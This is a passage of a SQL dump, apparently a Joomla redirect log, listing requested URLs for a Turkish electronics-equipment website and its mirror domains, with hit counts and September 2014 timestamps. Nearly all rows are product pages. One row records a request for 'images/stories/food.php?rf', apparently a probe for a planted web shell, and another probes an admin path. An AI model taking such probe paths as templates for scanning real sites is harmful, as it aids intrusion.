00:00:00',301),(5399,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-09-05 07:23:40','0000-00-00 00:00:00',301),(5400,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-09-05 07:46:47','0000-00-00 00:00:00',301),(5401,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',6,0,'2014-09-05 08:01:21','0000-00-00 00:00:00',301),(5402,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=0&lang=en','','','',1,0,'2014-09-05 12:01:40','0000-00-00 00:00:00',301),(5403,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=0&lang=tr','','','',1,0,'2014-09-05 12:03:16','0000-00-00 00:00:00',301),(5404,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=0&lang=en','','','',1,0,'2014-09-05 13:04:33','0000-00-00 00:00:00',301),(5405,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',1,0,'2014-09-05 13:19:33','0000-00-00 00:00:00',301),(5406,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',3,0,'2014-09-05 15:20:23','0000-00-00 00:00:00',301),(5407,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=0&lang=tr','','','',1,0,'2014-09-05 15:21:19','0000-00-00 00:00:00',301),(5408,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-09-05 15:56:18','0000-00-00 00:00:00',301),(5409,'http://www.3s-technologies.com.tr/index.php/admin/','','','',1,0,'2014-09-05 17:53:08','0000-00-00 00:00:00',301),(5410,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-09-05 17:53:58','0000-00-00 00:00:00',301),(5411,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-09-05 18:44:53','0000-00-00 00:00:00',301),(5412,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=&lang=tr','','','',1,0,'2014-09-05 19:21:55','0000-00-00 00:00:00',301),(5413,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=&lang=en','','','',1,0,'2014-09-05 19:33:14','0000-00-00 00:00:00',301),(5414,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',1,0,'2014-09-05 22:19:52','0000-00-00 00:00:00',301),(5415,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138','','','',2,0,'2014-09-05 22:22:59','0000-00-00 00:00:00',301),(5416,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',1,0,'2014-09-05 22:25:17','0000-00-00 00:00:00',301),(5417,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37','','','',1,0,'2014-09-05 22:26:03','0000-00-00 00:00:00',301),(5418,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',1,0,'2014-09-05 22:33:46','0000-00-00 00:00:00',301),(5419,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',1,0,'2014-09-05 22:34:32','0000-00-00 00:00:00',301),(5420,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',7,0,'2014-09-05 22:35:20','0000-00-00 00:00:00',301),(5421,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',2,0,'2014-09-05 22:37:38','0000-00-00 00:00:00',301),(5422,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50','','','',1,0,'2014-09-05 22:44:40','0000-00-00 00:00:00',301),(5423,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',1,0,'2014-09-05 22:53:58','0000-00-00 00:00:00',301),(5424,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',1,0,'2014-09-05 22:55:24','0000-00-00 00:00:00',301),(5425,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',1,0,'2014-09-05 23:12:24','0000-00-00 00:00:00',301),(5426,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103','','','',1,0,'2014-09-05 23:13:56','0000-00-00 00:00:00',301),(5427,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',2,0,'2014-09-05 23:19:21','0000-00-00 00:00:00',301),(5428,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',2,0,'2014-09-05 23:25:09','0000-00-00 00:00:00',301),(5429,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62','','','',1,0,'2014-09-05 23:25:31','0000-00-00 00:00:00',301),(5430,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55','','','',1,0,'2014-09-05 23:30:56','0000-00-00 00:00:00',301),(5431,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',1,0,'2014-09-05 23:31:42','0000-00-00 00:00:00',301),(5432,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',3,0,'2014-09-05 23:37:07','0000-00-00 00:00:00',301),(5433,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147','','','',2,0,'2014-09-05 23:44:50','0000-00-00 00:00:00',301),(5434,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112','','','',2,0,'2014-09-05 23:53:20','0000-00-00 00:00:00',301),(5435,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',1,0,'2014-09-05 23:57:24','0000-00-00 00:00:00',301),(5436,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2','','','',1,0,'2014-09-06 00:01:50','0000-00-00 00:00:00',301),(5437,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141','','','',1,0,'2014-09-06 00:11:53','0000-00-00 00:00:00',301),(5438,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152','','','',1,0,'2014-09-06 00:19:36','0000-00-00 00:00:00',301),(5439,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',1,0,'2014-09-06 00:22:41','0000-00-00 00:00:00',301),(5440,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',1,0,'2014-09-06 00:31:50','0000-00-00 00:00:00',301),(5441,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',1,0,'2014-09-06 00:33:32','0000-00-00 00:00:00',301),(5442,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109','','','',1,0,'2014-09-06 00:34:17','0000-00-00 00:00:00',301),(5443,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159','','','',1,0,'2014-09-06 00:42:46','0000-00-00 00:00:00',301),(5444,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',1,0,'2014-09-06 00:47:25','0000-00-00 00:00:00',301),(5445,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140','','','',2,0,'2014-09-06 00:48:11','0000-00-00 00:00:00',301),(5446,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',1,0,'2014-09-06 00:58:13','0000-00-00 00:00:00',301),(5447,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=tr&Itemid=0','','','',1,0,'2014-09-06 00:59:30','0000-00-00 00:00:00',301),(5448,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',1,0,'2014-09-06 01:01:19','0000-00-00 00:00:00',301),(5449,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',1,0,'2014-09-06 01:02:05','0000-00-00 00:00:00',301),(5450,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',1,0,'2014-09-06 01:05:11','0000-00-00 00:00:00',301),(5451,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',2,0,'2014-09-06 01:06:43','0000-00-00 00:00:00',301),(5452,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',1,0,'2014-09-06 01:07:31','0000-00-00 00:00:00',301),(5453,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',1,0,'2014-09-06 01:08:16','0000-00-00 00:00:00',301),(5454,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',1,0,'2014-09-06 01:09:02','0000-00-00 00:00:00',301),(5455,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152','','','',1,0,'2014-09-06 01:22:14','0000-00-00 00:00:00',301),(5456,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141','','','',1,0,'2014-09-06 01:29:54','0000-00-00 00:00:00',301),(5457,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',1,0,'2014-09-06 01:37:10','0000-00-00 00:00:00',301),(5458,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-09-06 01:37:14','0000-00-00 00:00:00',301),(5459,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',1,0,'2014-09-06 01:37:37','0000-00-00 00:00:00',301),(5460,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=0&lang=en','','','',1,0,'2014-09-06 01:37:59','0000-00-00 00:00:00',301),(5461,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151','','','',1,0,'2014-09-06 01:39:57','0000-00-00 00:00:00',301),(5462,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149','','','',1,0,'2014-09-06 02:20:09','0000-00-00 00:00:00',301),(5463,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163','','','',1,0,'2014-09-06 02:28:36','0000-00-00 00:00:00',301),(5464,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153','','','',1,0,'2014-09-06 02:40:12','0000-00-00 00:00:00',301),(5465,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',3,0,'2014-09-06 02:44:50','0000-00-00 00:00:00',301),(5466,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150','','','',1,0,'2014-09-06 02:47:09','0000-00-00 00:00:00',301),(5467,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',1,0,'2014-09-06 02:48:44','0000-00-00 00:00:00',301),(5468,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',2,0,'2014-09-06 02:49:28','0000-00-00 00:00:00',301),(5469,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',2,0,'2014-09-06 02:50:14','0000-00-00 00:00:00',301),(5470,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',2,0,'2014-09-06 02:51:02','0000-00-00 00:00:00',301),(5471,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',2,0,'2014-09-06 02:51:47','0000-00-00 00:00:00',301),(5472,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',1,0,'2014-09-06 02:54:06','0000-00-00 00:00:00',301),(5473,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122','','','',1,0,'2014-09-06 02:54:52','0000-00-00 00:00:00',301),(5474,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143','','','',1,0,'2014-09-06 02:55:40','0000-00-00 00:00:00',301),(5475,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default','','','',1,0,'2014-09-06 02:58:44','0000-00-00 00:00:00',301),(5476,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',2,0,'2014-09-06 02:59:30','0000-00-00 00:00:00',301),(5477,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',1,0,'2014-09-06 03:01:05','0000-00-00 00:00:00',301),(5478,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131','','','',1,0,'2014-09-06 03:01:49','0000-00-00 00:00:00',301),(5479,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145','','','',1,0,'2014-09-06 03:47:56','0000-00-00 00:00:00',301),(5480,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',1,0,'2014-09-06 04:12:34','0000-00-00 00:00:00',301),(5481,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162','','','',1,0,'2014-09-06 04:17:12','0000-00-00 00:00:00',301),(5482,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',1,0,'2014-09-06 04:20:17','0000-00-00 00:00:00',301),(5483,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151','','','',1,0,'2014-09-06 04:21:03','0000-00-00 00:00:00',301),(5484,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153','','','',1,0,'2014-09-06 04:21:50','0000-00-00 00:00:00',301),(5485,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',1,0,'2014-09-06 04:23:23','0000-00-00 00:00:00',301),(5486,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',1,0,'2014-09-06 04:59:48','0000-00-00 00:00:00',301),(5487,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',1,0,'2014-09-06 05:00:35','0000-00-00 00:00:00',301),(5488,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',1,0,'2014-09-06 05:09:51','0000-00-00 00:00:00',301),(5489,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61','','','',1,0,'2014-09-06 05:12:56','0000-00-00 00:00:00',301),(5490,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',1,0,'2014-09-06 05:13:43','0000-00-00 00:00:00',301),(5491,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87','','','',1,0,'2014-09-06 05:15:16','0000-00-00 00:00:00',301),(5492,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154','','','',1,0,'2014-09-06 05:16:02','0000-00-00 00:00:00',301),(5493,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=0&lang=tr','','','',1,0,'2014-09-06 05:16:58','0000-00-00 00:00:00',301),(5494,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',1,0,'2014-09-06 05:20:40','0000-00-00 00:00:00',301),(5495,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160','','','',1,0,'2014-09-06 05:22:13','0000-00-00 00:00:00',301),(5496,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150','','','',1,0,'2014-09-06 05:23:45','0000-00-00 00:00:00',301),(5497,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79','','','',4,0,'2014-09-06 05:24:32','0000-00-00 00:00:00',301),(5498,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122','','','',1,0,'2014-09-06 05:29:56','0000-00-00 00:00:00',301),(5499,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',1,0,'2014-09-06 05:38:13','0000-00-00 00:00:00',301),(5500,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142','','','',1,0,'2014-09-06 05:39:59','0000-00-00 00:00:00',301),(5501,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-09-06 07:03:56','0000-00-00 00:00:00',301),(5502,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104','','','',1,0,'2014-09-06 09:31:23','0000-00-00 00:00:00',301),(5503,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-09-06 09:51:45','0000-00-00 00:00:00',301),(5504,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',1,0,'2014-09-06 12:01:32','0000-00-00 00:00:00',301),(5505,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=&lang=en','','','',1,0,'2014-09-06 15:02:13','0000-00-00 00:00:00',301),(5506,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-09-06 16:29:19','0000-00-00 00:00:00',301),(5507,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=0&lang=tr','','','',2,0,'2014-09-06 16:42:56','0000-00-00 00:00:00',301),(5508,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-09-06 17:46:48','0000-00-00 00:00:00',301),(5509,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',1,0,'2014-09-06 20:26:26','0000-00-00 00:00:00',301),(5510,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-09-06 21:59:08','0000-00-00 00:00:00',301),(5511,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',1,0,'2014-09-06 22:21:43','0000-00-00 00:00:00',301),(5512,'http://www.3s-technologies.com.tr/index.php/en/nologia/tag-noticias/','','','',1,0,'2014-09-06 22:59:18','0000-00-00 00:00:00',301),(5513,'http://www.3s-technologies.com.tr/index.php/en/muziektheorie','','','',1,0,'2014-09-06 23:13:34','0000-00-00 00:00:00',301),(5514,'http://www.3s-technologies.com.tr/index.php/en/productsncasa/','','','',1,0,'2014-09-06 23:37:12','0000-00-00 00:00:00',301),(5515,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-09-06 23:55:10','0000-00-00 00:00:00',301),(5516,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-09-07 03:51:40','0000-00-00 00:00:00',301),(5517,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',1,0,'2014-09-07 06:00:32','0000-00-00 00:00:00',301),(5518,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/images/stories/food.php?rf','','','',1,0,'2014-09-07 08:10:48','0000-00-00 00:00:00',301),(5519,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=&lang=tr','','','',1,0,'2014-09-07 12:11:23','0000-00-00 00:00:00',301),(5520,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',1,0,'2014-09-07 12:36:31','0000-00-00 00:00:00',301),(5521,'http://www.3s-technologies.com.tr/index.php/tr/n-wear/','','','',1,0,'2014-09-07 13:38:39','0000-00-00 00:00:00',301),(5522,'http://www.3s-technologies.com.tr/index.php/tr/tism','','','',1,0,'2014-09-07 13:39:53','0000-00-00 00:00:00',301),(5523,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-09-07 13:57:53','0000-00-00 00:00:00',301),(5524,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-09-07 14:07:00','0000-00-00 00:00:00',301),(5525,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-09-07 15:36:45','0000-00-00 00:00:00',301),(5526,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107','','','',1,0,'2014-09-07 17:17:19','0000-00-00 00:00:00',301),(5527,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=tr','','','',1,0,'2014-09-07 18:23:54','0000-00-00 00:00:00',301),(5528,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-09-07 18:36:30','0000-00-00 00:00:00',301),(5529,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',1,0,'2014-09-07 19:52:12','0000-00-00 00:00:00',301),(5530,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=0&lang=tr','','','',1,0,'2014-09-07 20:20:53','0000-00-00 00:00:00',301),(5531,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=0&lang=en','','','',1,0,'2014-09-07 20:56:17','0000-00-00 00:00:00',301),(5532,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',2,0,'2014-09-08 00:28:50','0000-00-00 00:00:00',301),(5533,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=42&Itemid=0&lang=en','','','',1,0,'2014-09-08 05:39:54','0000-00-00 00:00:00',301),(5534,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-09-08 06:52:01','0000-00-00 00:00:00',301),(5535,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','https://www.led-bazaar.net/','',2,0,'2014-09-08 09:19:12','0000-00-00 00:00:00',301),(5536,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',3,0,'2014-09-08 09:35:05','0000-00-00 00:00:00',301),(5537,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=tr','','http://www.ledbazaar.org/','',2,0,'2014-09-08 12:24:37','0000-00-00 